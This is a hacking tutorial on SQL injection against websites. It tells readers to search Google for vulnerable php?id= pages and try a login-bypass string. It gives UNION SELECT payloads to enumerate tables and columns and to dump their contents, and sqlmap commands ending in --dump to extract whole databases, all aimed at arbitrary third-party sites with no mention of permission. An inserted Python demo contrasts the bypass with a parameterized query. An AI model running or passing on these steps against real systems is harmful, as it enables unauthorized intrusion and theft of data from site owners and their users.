SQL Injection Authentication Bypass Method:: Chinni Diwakar


SQL Injection Authentication Bypass Method:

Enter 1' or '1' = '1 in both the username and password fields. If the target web application is
vulnerable to SQL injection, it will grant access even with this malformed input.

You will then be given access to the remote website.
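The bypass above, run against a constructed SQLite table as an added example (not code from the original document): the concatenated query accepts the 1' or '1' = '1 input, while the parameterized query rejects it. It also covers the single-quote input used in the manual steps; the table, the credentials and the function names are assumptions made for the demo.

```python
import sqlite3

PAYLOAD = "1' or '1' = '1"  # the input string from the text above

def make_db():
    """Constructed in-memory user table (sample data, not from the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; store a hash in practice.
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # Deliberately vulnerable: input is pasted into the SQL text, so a quote
    # in the input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_safe(db, username, password):
    # Hardened: ? placeholders bind the values as data; they are never parsed.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def outcome(login, db, username, password):
    """True/False for the login attempt, or 'sql error' if the query broke."""
    try:
        return login(db, username, password)
    except sqlite3.Error:
        return "sql error"

if __name__ == "__main__":
    db = make_db()
    cases = [("admin", "s3cret-constructed"), (PAYLOAD, PAYLOAD), ("'", "x")]
    for user, pw in cases:
        print(repr(user),
              "vulnerable:", outcome(login_vulnerable, db, user, pw),
              "safe:", outcome(login_safe, db, user, pw))
```

With the payload, the concatenated WHERE clause ends in or '1' = '1', which is true for every row, so the vulnerable login succeeds without valid credentials.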

SQL Injection Manual Steps:

Finding the vulnerable page in Google with Google dorks

Search for php?id= along with your favorite keywords to find vulnerable websites.

Enter a single quote (') to test for the SQL injection vulnerability.

If you get an SQL error, or content goes missing from the web page, the website is vulnerable.

Append order by 1--

then order by 2--

and so on until you get an error.

If you get the error at 11, you have 10 columns.

If you get the error at 8, you have 7 columns.

Then replace order by with

union select (list of columns)--

union select 1,2,3,4,5,6,7--

Sometimes give a negative php id as well, like

php?id=1 union select 1,2,3,4,5,6,7--

or

php?id=-1 union select 1,2,3,4,5,6,7--

The above command will show you the vulnerable column numbers in the web page.

You can simply replace them with SQL commands to get the SQL query output.

Example

To find the version of the database server, execute a command like the one in the image below.

The database server will give information like this

To find the host and username, execute a command like the one in the image below.

You will get a reply as follows

Now, if you want, you can also execute some commands to retrieve database information such as tables

php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Then you can extract column names from a table like this

php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=<table name text or ascii values>--

php?id=-1 union select 1,2,group_concat(<column name you want to get>),4,5,6,7 from <table_name>--

You will get output like this

Performing SQL Injection with the sqlmap tool

Finding a vulnerable website from Google

Search for php?id= along with the combination of other Google dorks to find vulnerable pages.

Then take any page which includes php?id=<some number>

Open a blank terminal and execute the following command.

sqlmap -u <URL of the vulnerable website> --dbs

This will leak out the target SQL server's database names. Then we have to retrieve the table names from
the database with the command given below.

sqlmap -u <URL of the vulnerable website> -D <database> --tables

After some processing, as in the picture above, you will get table names as in the picture below.

Next we need to extract column information from the tables shown above. For that, use the following
command.

sqlmap -u <URL of the vulnerable website> -D <database> -T <table name> --columns

You will get column names like this

Finally, we need to grab the contents of the database columns with the command below.

sqlmap -u <URL of the vulnerable website> -D <database> -T <table name> -C <columnnames> --dump

You will be asked a few questions in order to get the contents; act according to the questions. You can see
a few in the image above. Finally, you will get data like that shown in the image below.
